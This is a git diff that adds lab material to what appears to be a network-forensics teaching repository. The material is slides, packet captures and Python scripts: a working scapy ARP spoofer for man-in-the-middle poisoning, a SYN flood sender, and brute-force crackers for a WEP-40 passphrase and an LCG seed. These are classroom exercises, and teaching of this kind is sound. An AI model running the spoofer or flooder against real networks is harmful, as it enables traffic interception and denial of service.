diff --git a/Basic_Computer_Skills_for_Forensics/dd_image/usb_dd.7z b/Basic_Computer_Skills_for_Forensics/dd_image/usb_dd.7z new file mode 100644 index 0000000..7bf646c Binary files /dev/null and b/Basic_Computer_Skills_for_Forensics/dd_image/usb_dd.7z differ diff --git a/Illegal_Possession_Images/SMTP_Email_Forensics.pptx b/Illegal_Possession_Images/SMTP_Email_Forensics.pptx new file mode 100644 index 0000000..079c261 Binary files /dev/null and b/Illegal_Possession_Images/SMTP_Email_Forensics.pptx differ diff --git a/Illegal_Possession_Images/lab_files/traffic/smtp.pcap b/Illegal_Possession_Images/lab_files/traffic/smtp.pcap new file mode 100644 index 0000000..931b43b Binary files /dev/null and b/Illegal_Possession_Images/lab_files/traffic/smtp.pcap differ diff --git a/NIST_Data_Leakage_Case/NIST_Data_Leakage_04_Email_USB.pptx b/NIST_Data_Leakage_Case/NIST_Data_Leakage_04_Email_USB.pptx index ea9612d..9b2563b 100644 Binary files a/NIST_Data_Leakage_Case/NIST_Data_Leakage_04_Email_USB.pptx and b/NIST_Data_Leakage_Case/NIST_Data_Leakage_04_Email_USB.pptx differ diff --git a/Networking_Forensics/10_HTTP_tshark_Forensics_1_SYN_Flood.pptx b/Networking_Forensics/10_HTTP_tshark_Forensics_1_SYN_Flood.pptx new file mode 100644 index 0000000..880f120 Binary files /dev/null and b/Networking_Forensics/10_HTTP_tshark_Forensics_1_SYN_Flood.pptx differ diff --git a/Networking_Forensics/20_Wireless_aircrack_WEP40_1.pptx b/Networking_Forensics/20_Wireless_aircrack_WEP40_1.pptx new file mode 100644 index 0000000..26d4f09 Binary files /dev/null and b/Networking_Forensics/20_Wireless_aircrack_WEP40_1.pptx differ diff --git a/Networking_Forensics/30_SMTP_Email_Forensics.pptx b/Networking_Forensics/30_SMTP_Email_Forensics.pptx new file mode 100644 index 0000000..079c261 Binary files /dev/null and b/Networking_Forensics/30_SMTP_Email_Forensics.pptx differ diff --git a/Networking_Forensics/40_ARP_wireshark.pptx b/Networking_Forensics/40_ARP_wireshark.pptx new file mode 100644 index 0000000..3ca246f Binary files /dev/null and b/Networking_Forensics/40_ARP_wireshark.pptx differ diff --git a/Networking_Forensics/code/arp_spoofer.py b/Networking_Forensics/code/arp_spoofer.py new file mode 100644 index 0000000..10a6886 --- /dev/null +++ b/Networking_Forensics/code/arp_spoofer.py @@ -0,0 +1,93 @@ +# https://www.geeksforgeeks.org/python-how-to-create-an-arp-spoofer-using-scapy/ +# https://www.thepythoncode.com/article/building-arp-spoofer-using-scapy + +import scapy.all as scapy +import time +import argparse +import time +import os +import sys + +def get_mac(ip): + arp_request = scapy.ARP(pdst = ip) + broadcast = scapy.Ether(dst ="ff:ff:ff:ff:ff:ff") + arp_request_broadcast = broadcast / arp_request + answered_list = scapy.srp(arp_request_broadcast, timeout = 5, verbose = False)[0] + return answered_list[0][1].hwsrc + +def spoof(target_ip, host_ip, verbose=True): + """ + Kali tells `target_ip` saying that "I have the host_ip that you want to talk". + However, Kali provides its own Mac address. + In target's arp: + Host IP, attacker's/Kali Mac address + """ + packet = scapy.ARP(op = 2, pdst = target_ip, hwdst = get_mac(target_ip), + psrc = host_ip) + scapy.send(packet, verbose = False) + + if verbose: + # get the MAC address of the default interface we are using + self_mac = scapy.ARP().hwsrc + print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac)) + + +def restore(destination_ip, source_ip): + destination_mac = get_mac(destination_ip) + source_mac = get_mac(source_ip) + packet = scapy.ARP(op = 2, pdst = destination_ip, hwdst = destination_mac, psrc = source_ip, hwsrc = source_mac) + scapy.send(packet, verbose = False) + + +def _enable_linux_iproute(): + """ + Enables IP route ( IP Forward ) in linux-based distro + """ + file_path = "/proc/sys/net/ipv4/ip_forward" + with open(file_path) as f: + if f.read() == 1: + # already enabled + return + with open(file_path, "w") as f: + print(1, file=f) + + +def enable_ip_route(verbose=True): + """ + Enables IP forwarding + """ + if verbose: + print("[!] Enabling IP Routing...") + _enable_linux_iproute() + if verbose: + print("[!] IP Routing enabled.") + +if __name__ == "__main__": + # Get the command-line arguments + args = sys.argv + + # victim ip address + target = args[1] + # gateway ip address + host = args[2] + # print progress to the screen + verbose = True + # enable ip forwarding + enable_ip_route() + try: + sent_packets_count = 0 + while True: + # telling the `target` that we are the `host` + spoof(target, host, verbose) + # telling the `host` that we are the `target` + spoof(host, target, verbose) + + sent_packets_count = sent_packets_count + 2 + print("\r[*] Packets Sent "+str(sent_packets_count), end ="") + # sleep for two second + time.sleep(3) + except KeyboardInterrupt: + print("[!] Detected CTRL+C ! restoring the network, please wait...") + restore(target, host) + restore(host, target) + print("[+] Arp Spoof Stopped") diff --git a/Networking_Forensics/lab_files/SYN_Flood/mySYNFloodCapture.pcap b/Networking_Forensics/lab_files/SYN_Flood/mySYNFloodCapture.pcap new file mode 100644 index 0000000..2a929e4 Binary files /dev/null and b/Networking_Forensics/lab_files/SYN_Flood/mySYNFloodCapture.pcap differ diff --git a/Networking_Forensics/lab_files/SYN_Flood/synflood.py b/Networking_Forensics/lab_files/SYN_Flood/synflood.py new file mode 100644 index 0000000..1c23cb2 --- /dev/null +++ b/Networking_Forensics/lab_files/SYN_Flood/synflood.py @@ -0,0 +1,11 @@ +from scapy.all import * + +def send_syn(target_ip_address, target_port, number_of_packets_to_send = 4, size_of_packet = 65000): + ip = IP(dst=target_ip_address) + tcp = TCP(sport=RandShort(), dport=target_port, flags="S") + raw = Raw(b"X" * size_of_packet) + p = ip / tcp / raw + send(p, count=number_of_packets_to_send, verbose=0) + print('send_syn(): Sent ' + str(number_of_packets_to_send) + ' packets of '+ str(size_of_packet) + 'size to ' + target_ip_address + ' on port ' + str(target_port)) + +send_syn(target_ip_address = "127.0.0.1", target_port= 80) \ No newline at end of file diff --git a/Networking_Forensics/lab_files/f0335017_She_died_in_February_at_the_age_of_74.doc b/Networking_Forensics/lab_files/f0335017_She_died_in_February_at_the_age_of_74.doc new file mode 100644 index 0000000..0bc91e2 Binary files /dev/null and b/Networking_Forensics/lab_files/f0335017_She_died_in_February_at_the_age_of_74.doc differ diff --git a/Networking_Forensics/lab_files/traffic/arp.pcap b/Networking_Forensics/lab_files/traffic/arp.pcap new file mode 100644 index 0000000..c0b6835 Binary files /dev/null and b/Networking_Forensics/lab_files/traffic/arp.pcap differ diff --git a/Networking_Forensics/lab_files/traffic/arp_poison.pcap b/Networking_Forensics/lab_files/traffic/arp_poison.pcap new file mode 100644 index 0000000..0bfb512 Binary files /dev/null and b/Networking_Forensics/lab_files/traffic/arp_poison.pcap differ diff --git a/Networking_Forensics/lab_files/traffic/basic.log b/Networking_Forensics/lab_files/traffic/basic.log new file mode 100644 index 0000000..c795867 Binary files /dev/null and b/Networking_Forensics/lab_files/traffic/basic.log differ diff --git a/Networking_Forensics/lab_files/traffic/building_20201108_221645.jpg b/Networking_Forensics/lab_files/traffic/building_20201108_221645.jpg new file mode 100644 index 0000000..87a358e Binary files /dev/null and b/Networking_Forensics/lab_files/traffic/building_20201108_221645.jpg differ diff --git a/Networking_Forensics/lab_files/traffic/image.html b/Networking_Forensics/lab_files/traffic/image.html new file mode 100644 index 0000000..c3964d1 --- /dev/null +++ b/Networking_Forensics/lab_files/traffic/image.html @@ -0,0 +1,12 @@ + + + + +

My First Heading

+ +

My first paragraph.

+ +UB + + + diff --git a/Networking_Forensics/lab_files/traffic/image.log b/Networking_Forensics/lab_files/traffic/image.log new file mode 100644 index 0000000..7a27a0e Binary files /dev/null and b/Networking_Forensics/lab_files/traffic/image.log differ diff --git a/Networking_Forensics/lab_files/traffic/image2.log b/Networking_Forensics/lab_files/traffic/image2.log new file mode 100644 index 0000000..5e9e30d Binary files /dev/null and b/Networking_Forensics/lab_files/traffic/image2.log differ diff --git a/Networking_Forensics/lab_files/traffic/smtp.pcap b/Networking_Forensics/lab_files/traffic/smtp.pcap new file mode 100644 index 0000000..931b43b Binary files /dev/null and b/Networking_Forensics/lab_files/traffic/smtp.pcap differ diff --git a/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_GPU.py b/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_GPU.py new file mode 100644 index 0000000..90a05ce --- /dev/null +++ b/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_GPU.py @@ -0,0 +1,72 @@ +# Generated By ChatGPT DGL +# Write Python code that generates all possible combinations of 8 characters, +# with each character consisting of either a lowercase or uppercase English letter and +# also has a function to check the XOR sum of the 0th, 3rd, 6th characters, +# the XOR sum of the 1st, 4th, 7th characters, +# and the XOR sum of the 2nd and 5th characters. +# Also add function to check sha1 hash of the combination startwith 0xff7b948953ac +# Use Pytorch framework to use GPU + +import torch +import string +import hashlib +import time +import itertools + + +def generate_combinations_test(device): + ascii_codes = [ord(char) for char in "cgwpkexz"] + return torch.tensor([ascii_codes], dtype=torch.uint8, device=device) + + +def generate_combinations(device): + characters = string.ascii_lowercase + combinations = torch.tensor([list(map(ord, chars)) for chars in itertools.product( + characters, repeat=8)], dtype=torch.uint8, device=device) + return combinations + + +def check_xor_sum(combination): + xor_sum_0_3_6 = combination[:, 0].int( + ) ^ combination[:, 3].int() ^ combination[:, 6].int() + xor_sum_1_4_7 = combination[:, 1].int( + ) ^ combination[:, 4].int() ^ combination[:, 7].int() + xor_sum_2_5 = combination[:, 2].int() ^ combination[:, 5].int() + return (xor_sum_0_3_6 == 0x6b) & (xor_sum_1_4_7 == 0x76) & (xor_sum_2_5 == 0x12) + +def add_xy_and_check_sha1(valid_combinations, device): + letters = 'abcdefghijklmnopqrstuvwxyz' + xy_combinations = torch.tensor( + [[ord(x), ord(y)] for x in letters for y in letters], dtype=torch.uint8, device=device) + + final_results = [] + for combination in valid_combinations: + for xy in xy_combinations: + new_combination = torch.cat((combination[:3], xy[0].unsqueeze( + 0), combination[3:6], xy[1].unsqueeze(0), combination[6:]), dim=0) + sha1_hash = hashlib.sha1( + new_combination.cpu().numpy().tobytes()).hexdigest() + if sha1_hash.startswith('ff7b948953ac'): + final_results.append(new_combination) + return final_results + +if torch.cuda.is_available(): + device = torch.device("cuda") +else: + device = torch.device("cpu") + + +combinations = generate_combinations(device) +num_combinations = combinations.shape[0] +start_time = time.time() + +valid_combinations = combinations[check_xor_sum(combinations)] +valid_combinations = add_xy_and_check_sha1(valid_combinations, device) +if len(valid_combinations) > 0: + print(valid_combinations[0].char().cpu().numpy().tolist()) +else: + print("No valid combinations found") + +end_time = time.time() +print("Processing took %.2f seconds for %d combinations" % + (end_time - start_time, num_combinations)) \ No newline at end of file diff --git a/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_GPU_Improved_v1.py b/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_GPU_Improved_v1.py new file mode 100644 index 0000000..1922ef9 --- /dev/null +++ b/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_GPU_Improved_v1.py @@ -0,0 +1,76 @@ +# Generated By ChatGPT DGL +# Write Python code that generates all possible combinations of 8 characters, +# with each character consisting of either a lowercase or uppercase English letter and +# also has a function to check the XOR sum of the 0th, 3rd, 6th characters, +# the XOR sum of the 1st, 4th, 7th characters, +# and the XOR sum of the 2nd and 5th characters. +# Also add function to check sha1 hash of the combination startwith 0xff7b948953ac +# Use Pytorch framework to use GPU +# Generated By ChatGPT DGL +# Write Python code that generates all possible combinations of 8 characters, +# with each character consisting of either a lowercase or uppercase English letter and +# also has a function to check the XOR sum of the 0th, 3rd, 6th characters, +# the XOR sum of the 1st, 4th, 7th characters, +# and the XOR sum of the 2nd and 5th characters. +# Also add function to check sha1 hash of the combination startwith 0xff7b948953ac +# Use Pytorch framework to use GPU + +import torch +import string +import hashlib +import time +import itertools + + +def generate_combinations_test(device): + ascii_codes = [ord(char) for char in "cgwpkexz"] + return torch.tensor([ascii_codes], dtype=torch.uint8, device=device) + + +def check_xor_sum(combination): + xor_sum_0_3_6 = combination[:, 0].int( + ) ^ combination[:, 3].int() ^ combination[:, 6].int() + xor_sum_1_4_7 = combination[:, 1].int( + ) ^ combination[:, 4].int() ^ combination[:, 7].int() + xor_sum_2_5 = combination[:, 2].int() ^ combination[:, 5].int() + return (xor_sum_0_3_6 == 0x6b) & (xor_sum_1_4_7 == 0x76) & (xor_sum_2_5 == 0x12) + +def add_xy_and_check_sha1(valid_combinations, device): + letters = 'abcdefghijklmnopqrstuvwxyz' + xy_combinations = torch.tensor( + [[ord(x), ord(y)] for x in letters for y in letters], dtype=torch.uint8, device=device) + + final_results = [] + for combination in valid_combinations: + for xy in xy_combinations: + new_combination = torch.cat((combination[:3], xy[0].unsqueeze( + 0), combination[3:6], xy[1].unsqueeze(0), combination[6:]), dim=0) + sha1_hash = hashlib.sha1( + new_combination.cpu().numpy().tobytes()).hexdigest() + if sha1_hash.startswith('ff7b948953ac'): + final_results.append(new_combination) + return final_results + +if torch.cuda.is_available(): + device = torch.device("cuda") +else: + device = torch.device("cpu") + +start_time = time.time() +characters = string.ascii_lowercase +valid_combinations=[] +for e in torch.tensor([list(map(ord, chars)) for chars in itertools.product( + characters, repeat=8)], dtype=torch.uint8, device=device): + if check_xor_sum(e): + valid_combinations.append(e) + print(e) + +valid_combinations = add_xy_and_check_sha1(valid_combinations, device) +if len(valid_combinations) > 0: + print(valid_combinations[0].char().cpu().numpy().tolist()) +else: + print("No valid combinations found") + +end_time = time.time() +print("Processing took %.2f seconds for " % + (end_time - start_time)) \ No newline at end of file diff --git a/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_noGPU.py b/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_noGPU.py new file mode 100644 index 0000000..b097699 --- /dev/null +++ b/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_noGPU.py @@ -0,0 +1,59 @@ +# Write Python code that generates all possible combinations of 8 characters, +# with each character is a lowercase English letter and also has a function, check_xor_sum, +# to check the XOR sum of the 0th, 3rd, 6th characters is 0x6b, the XOR sum of the 1st, 4th, 7th characters is 0x76, +# and the XOR sum of the 2nd and 5th characters is 0x12. If check_xor_sum returns true, +# remember these valid combinations. Then write a function to generate all combinations of two lower case characters, +# call x and y, insert x after 3rd position and insert y after 6th position of valid combinations. +# The resultant new combination is 10 characters long strings. +# Also add function to check sha1 hash of the 10-character strings starts with ff7b948953ac. Print final results. + +import hashlib +import itertools + +def check_xor_sum(string): + if ord(string[0]) ^ ord(string[3]) ^ ord(string[6]) == 0x6b and \ + ord(string[1]) ^ ord(string[4]) ^ ord(string[7]) == 0x76 and \ + ord(string[2]) ^ ord(string[5]) == 0x12: + return True + return False + +def generate_8_char_combinations(): + characters = 'abcdefghijklmnopqrstuvwxyz' + combinations = itertools.product(characters, repeat=8) + valid_combinations = [] + for combination in combinations: + string = "".join(combination) + if check_xor_sum(string): + valid_combinations.append(string) + # valid_combinations = ["cgwpkexz"] + return valid_combinations + +def insert_letters(valid_combinations): + characters = 'abcdefghijklmnopqrstuvwxyz' + new_combinations = [] + for x in characters: + for y in characters: + for valid_combination in valid_combinations: + new_combination = valid_combination[:3] + x + \ + valid_combination[3:6] + y + valid_combination[6:] + new_combinations.append(new_combination) + return new_combinations + +def check_sha1_hash(new_combinations): + final_results = [] + for new_combination in new_combinations: + sha1_hash = hashlib.sha1(new_combination.encode('utf-8')).hexdigest() + if sha1_hash.startswith("ff7b948953ac"): + final_results.append(new_combination) + return final_results + +def main(): + valid_combinations = generate_8_char_combinations() + new_combinations = insert_letters(valid_combinations) + final_results = check_sha1_hash(new_combinations) + print("Final results:") + for result in final_results: + print(result) + +if __name__ == '__main__': + main() diff --git a/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_noGPU_Improved_v1.py b/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_noGPU_Improved_v1.py new file mode 100644 index 0000000..9d8e04a --- /dev/null +++ b/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_noGPU_Improved_v1.py @@ -0,0 +1,55 @@ +import itertools +import string +import hashlib + + +def generate_combinations(): + characters = string.ascii_lowercase + combinations = itertools.product(characters, repeat=8) + # For testing only + # combinations = ["aaaaaaaa", "cgwpkexz", "cgwpkexa", "cgwpkexa", "cgwpkexa", "cgwpkexa"] + return combinations + + +def check_xor_sum(combination): + if ord(combination[0]) ^ ord( + combination[3]) ^ ord(combination[6]) != 0x6b : + return False + if ord(combination[1]) ^ ord( + combination[4]) ^ ord(combination[7]) != 0x76: + return False + if ord(combination[2]) ^ ord(combination[5]) != 0x12: + return False + return True + + +def insert_letters(valid_combination): + new_combinations = [] + characters = 'abcdefghijklmnopqrstuvwxyz' + for x in characters: + for y in characters: + new_combination = tuple(list(valid_combination[:3]) + [x] + + list(valid_combination[3:6]) + [y] + + list(valid_combination[6:])) + new_combinations.append(new_combination) + return new_combinations + +def check_sha1_hash(combination): + combination_str = ''.join(combination) + sha1_hash = hashlib.sha1(combination_str.encode('utf-8')) + return sha1_hash.hexdigest().startswith('ff7b948953ac') + + +cracked= False +for combination in generate_combinations(): + # print("process: ", ''.join(combination)) + if check_xor_sum(combination): + print("Match xor sum: ", ''.join(combination)) + for comb_x_y in insert_letters(combination): + if check_sha1_hash(comb_x_y): + cracked = True + print("Cracked: ", ''.join(comb_x_y)) + break + if cracked: + break + diff --git a/Networking_Forensics/lab_files/wlan_decrypt/file.xz b/Networking_Forensics/lab_files/wlan_decrypt/file.xz new file mode 100644 index 0000000..b466111 Binary files /dev/null and b/Networking_Forensics/lab_files/wlan_decrypt/file.xz differ diff --git a/Networking_Forensics/lab_files/wlan_decrypt/findseed.py b/Networking_Forensics/lab_files/wlan_decrypt/findseed.py new file mode 100644 index 0000000..964f217 --- /dev/null +++ b/Networking_Forensics/lab_files/wlan_decrypt/findseed.py @@ -0,0 +1,26 @@ +# https://www.vnsecurity.net/ctf%20-%20clgt%20crew/ +# 2015/03/16/codegate-good-crypto.html + +key=[0xa4,0x3d,0xf6,0xf3,0x74] +a, c, m = 0x000343fd, 0x269ec3, 0xFFFFFF +secret_key_bytes=5 + +for seed in range(1<<24): + correct = True + x = seed + + for i in range(secret_key_bytes): + x = (a * x + c) & m + # shift 16 bits to right + # the same as check the second most significant byte + if (x>>16)!=key[i]: + correct = False + break + + if correct: + print("Found it: ", hex(seed)) + print("Verify: ") + + for i in range(secret_key_bytes): + seed = (a* seed + c) & m + print(hex(seed>>16),hex(seed)) \ No newline at end of file